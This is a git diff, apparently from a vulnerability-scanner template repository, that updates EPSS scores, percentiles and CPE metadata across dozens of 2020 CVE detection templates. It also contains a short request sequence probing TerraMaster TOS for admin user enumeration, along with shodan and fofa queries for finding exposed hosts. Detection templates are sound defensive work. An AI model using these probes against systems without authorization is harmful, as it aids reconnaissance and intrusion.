-14,8 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 - epss-score: 0.1375 + epss-score: 0.26869 cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* + epss-percentile: 0.96147 metadata: max-request: 1 shodan-query: port:8999 product:"Oracle WebLogic Server" diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index 7c1851a0a4..24cc9cebee 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -14,6 +14,7 @@ info: cwe-id: CWE-668 epss-score: 0.02936 cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* + epss-percentile: 0.89526 metadata: max-request: 1 vendor: akkadianlabs diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 29162b61f7..1b100e7a83 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 - epss-score: 0.00378 + epss-score: 0.00459 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* + epss-percentile: 0.72208 metadata: max-request: 1 vendor: processwire diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 0bf6b9376f..29621266a7 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-27481 cwe-id: CWE-89 - epss-score: 0.1745 + epss-score: 0.12044 cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94623 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 79d08426b8..0bb91a1c14 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27735 cwe-id: CWE-79 - epss-score: 0.00179 + epss-score: 0.00217 cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* + epss-percentile: 0.59 metadata: max-request: 1 vendor: wftpserver diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 687a3394eb..8c24851764 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-288,CWE-287 epss-score: 0.00365 cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.68896 metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index f8b813a318..d4a8d238d5 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27982 cwe-id: CWE-79 - epss-score: 0.00167 + epss-score: 0.00178 cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* + epss-percentile: 0.54259 metadata: max-request: 1 shodan-query: title:"icewarp" diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index 65bbc3cede..5f527d083f 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-306 epss-score: 0.1352 cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* + epss-percentile: 0.94881 metadata: max-request: 1 vendor: sonarsource diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index ec425f727d..ad40647908 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -10,10 +10,20 @@ info: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://www.terra-master.com/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-28185 + epss-score: 0.00406 + cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* + epss-percentile: 0.70469 metadata: fofa-query: '"TerraMaster" && header="TOS"' max-request: 2 verified: true + vendor: terra-master + product: tos tags: cve,cve2020,terramaster,enum,tos http: @@ -21,7 +31,6 @@ http: - | GET /tos/index.php?user/login HTTP/1.1 Host: {{Hostname}} - - | POST /wizard/initialise.php HTTP/1.1 Host: {{Hostname}} @@ -33,6 +42,7 @@ http: tab=checkuser&username=admin cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index c6587b0d51..54613ff4ce 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28188 cwe-id: CWE-78 - epss-score: 0.97235 + epss-score: 0.97282 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* + epss-percentile: 0.99781 metadata: max-request: 2 vendor: terra-master diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 68054c1ac0..106dbcda32 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28208 cwe-id: CWE-203 - epss-score: 0.00603 + epss-score: 0.00847 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* + epss-percentile: 0.80027 metadata: max-request: 1 vendor: rocket.chat diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index ef27c1dbc1..a6ee8b49e2 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2020-28351 cwe-id: CWE-79 - epss-score: 0.00314 + epss-score: 0.0036 cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* + epss-percentile: 0.68696 metadata: max-request: 1 vendor: mitel diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 2e7fb0d4cc..5a2776f594 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 - epss-score: 0.96694 + epss-score: 0.96633 cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:* + epss-percentile: 0.99468 metadata: max-request: 2 vendor: monitorr_project diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 5b9d534f88..ef0ff9dff5 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28976 cwe-id: CWE-918 - epss-score: 0.00452 + epss-score: 0.00616 cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.76102 metadata: max-request: 3 framework: wordpress diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index f59e74ba1b..173b04431e 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00159 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* + epss-percentile: 0.51802 metadata: max-request: 1 vendor: rainbowfishsoftware diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index f6fea46912..933a1586fe 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -13,8 +13,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29227 - epss-score: 0.00544 + epss-score: 0.00834 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.79881 metadata: max-request: 1 vendor: car_rental_management_system_project diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 22a88089ae..fccd5c8ac6 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29284 cwe-id: CWE-89 - epss-score: 0.05055 + epss-score: 0.04855 cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.91729 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index ce62bdb148..efeee50ee7 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29395 cwe-id: CWE-79 - epss-score: 0.03749 + epss-score: 0.05489 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.92226 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index 142e6cda98..9dd1cdb2ba 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.0129 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.84109 metadata: max-request: 2 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index a80efb85e7..3bb4131a60 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 - epss-score: 0.95315 + epss-score: 0.95089 cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* + epss-percentile: 0.99017 metadata: max-request: 2 verified: true diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index 39ecd7624c..caf611f4b1 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 - epss-score: 0.83522 + epss-score: 0.83723 cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* + epss-percentile: 0.98014 metadata: max-request: 2 verified: true diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index aeefddef1b..c23fd0d07e 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.1 cve-id: CVE-2020-3187 cwe-id: CWE-22 - epss-score: 0.97406 + epss-score: 0.97377 cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* + epss-percentile: 0.9986 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 3621417844..1634e08d72 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -19,12 +19,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-3452 cwe-id: CWE-22,CWE-20 - epss-score: 0.97544 - cpe: cpe:2.3:a:cisco:adaptive_security_appliance:*:*:*:*:*:*:*:* + epss-score: 0.97534 + cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* + epss-percentile: 0.99987 metadata: max-request: 2 vendor: cisco - product: adaptive_security_appliance + product: adaptive_security_appliance_software tags: lfi,kev,packetstorm,cve,cve2020,cisco http: diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 38c4a3d045..e054f358e9 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35234 cwe-id: CWE-532 - epss-score: 0.4891 + epss-score: 0.39621 cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9676 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index af43bed792..6bd4a93948 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35338 cwe-id: CWE-798 - epss-score: 0.04387 + epss-score: 0.05169 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* + epss-percentile: 0.91985 metadata: max-request: 1 vendor: mobileviewpoint diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index bb733a54c5..52c18e76f6 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35476 cwe-id: CWE-78 - epss-score: 0.96298 + epss-score: 0.96323 cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* + epss-percentile: 0.99341 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 9787df6907..31e6f053b5 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -16,8 +16,9 @@ info: cvss-score: 10 cve-id: CVE-2020-35489 cwe-id: CWE-434 - epss-score: 0.92295 + epss-score: 0.92577 cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.98617 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index e3c96601b3..93e0c5f41b 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35580 cwe-id: CWE-22 - epss-score: 0.02161 + epss-score: 0.02411 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* + epss-percentile: 0.88535 metadata: max-request: 1 vendor: searchblox diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index c9c15d6297..d98803ec80 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35598 cwe-id: CWE-22 - epss-score: 0.10696 + epss-score: 0.10794 cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.94342 metadata: max-request: 1 vendor: advanced_comment_system_project diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 2483d1dee1..2fe3c7af2e 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35713 cwe-id: CWE-78 - epss-score: 0.97277 + epss-score: 0.9717 cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99711 metadata: max-request: 1 vendor: linksys diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 635b914129..3f653c57d0 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -15,14 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35729 cwe-id: CWE-78 - epss-score: 0.94817 + epss-score: 0.95277 cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* + epss-percentile: 0.99064 metadata: max-request: 1 vendor: klogserver product: klog_server tags: cve,cve2020,klog,rce - variables: dummy: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 23348da812..f74e9d1fad 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35736 cwe-id: CWE-22 - epss-score: 0.01553 + epss-score: 0.01465 cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* + epss-percentile: 0.85077 metadata: max-request: 1 vendor: liftoffsoftware diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index e454ddacc3..376b9e8256 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01796 cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.86587 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 9eecc11d60..3b57f68cda 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.97219 cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* + epss-percentile: 0.99744 metadata: max-request: 1 vendor: twitter diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 4291dafffa..8d7dffb416 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.97233 cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* + epss-percentile: 0.99751 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index a728d77cef..5e15ce291f 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 - epss-score: 0.84079 + epss-score: 0.80821 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* + epss-percentile: 0.97904 metadata: max-request: 1 vendor: agentejo diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index b0282c3e01..597474129b 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 - epss-score: 0.78648 + epss-score: 0.76547 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* + epss-percentile: 0.97778 metadata: max-request: 2 shodan-query: http.favicon.hash:688609340 diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 09503cef4d..fc5328ab07 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 - epss-score: 0.80376 + epss-score: 0.75494 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* + epss-percentile: 0.97747 metadata: max-request: 1 vendor: agentejo diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index 870b298806..8c713b94b4 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.9 cve-id: CVE-2020-35951 cwe-id: CWE-306 - epss-score: 0.00189 + epss-score: 0.00158 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.51651 metadata: max-request: 4 framework: wordpress diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index cd4c846922..ed15f82fd5 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00127 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* + epss-percentile: 0.46587 metadata: verified: "true" shodan-query: http.favicon.hash:-1499940355 diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index ac018b6657..8a9eb0612e 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00127 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* + epss-percentile: 0.46587 metadata: max-request: 3 verified: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index ca4c5cacca..261de4127a 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00127 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* + epss-percentile: 0.46587 metadata: verified: "true" shodan-query: http.favicon.hash:-1499940355 diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 20c0dc9894..5385f7ee19 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00127 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* + epss-percentile: 0.46587 metadata: max-request: 3 verified: true diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 1752df2d3a..5c3d98166f 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-36112 cwe-id: CWE-89 - epss-score: 0.47622 + epss-score: 0.48049 cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* + epss-percentile: 0.97007 metadata: max-request: 1 vendor: cse_bookstore_project diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index a585d37ff6..f36541a93a 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2020-36289 cwe-id: CWE-863 - epss-score: 0.97254 + epss-score: 0.97071 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.99658 metadata: max-request: 2 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index a8f6b49430..7d057bacc4 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00331 cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* + epss-percentile: 0.67387 metadata: max-request: 1 shodan-query: http.html:'content="Smartstore' diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index ffc6e90988..e12616fe10 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36510 cwe-id: CWE-79 - epss-score: 0.00119 + epss-score: 0.00141 cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49173 metadata: max-request: 1 verified: "false" diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 9dddbca03c..f40c2e74b0 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -20,8 +20,9 @@ info: cvss-score: 8.2 cve-id: CVE-2020-4463 cwe-id: CWE-611 - epss-score: 0.40093 + epss-score: 0.36503 cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* + epss-percentile: 0.96633 metadata: max-request: 2 shodan-query: http.favicon.hash:-399298961 diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index be7dcf8393..b84b06255a 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00383 cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* + epss-percentile: 0.69634 metadata: max-request: 2 verified: true diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index ea58fdeb3d..81575e071f 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5192 cwe-id: CWE-89 - epss-score: 0.01145 + epss-score: 0.02275 cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* + epss-percentile: 0.88219 metadata: max-request: 2 verified: true diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 2009e4c55f..d334a2a970 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -15,8 +15,9 @@ info: cvss-score: 4.3 cve-id: CVE-2020-5284 cwe-id: CWE-22,CWE-23 - epss-score: 0.00104 + epss-score: 0.00152 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* + epss-percentile: 0.50785 metadata: max-request: 1 vendor: zeit diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index e144e45f6a..75f3890923 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.01326 cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.84331 metadata: max-request: 1 vendor: phpgurukul_dairy_farm_shop_management_system_project diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index f8740c8425..e1c35ed2d5 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22,CWE-23 epss-score: 0.00258 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* + epss-percentile: 0.6281 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index b5485609cd..d213561407 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ 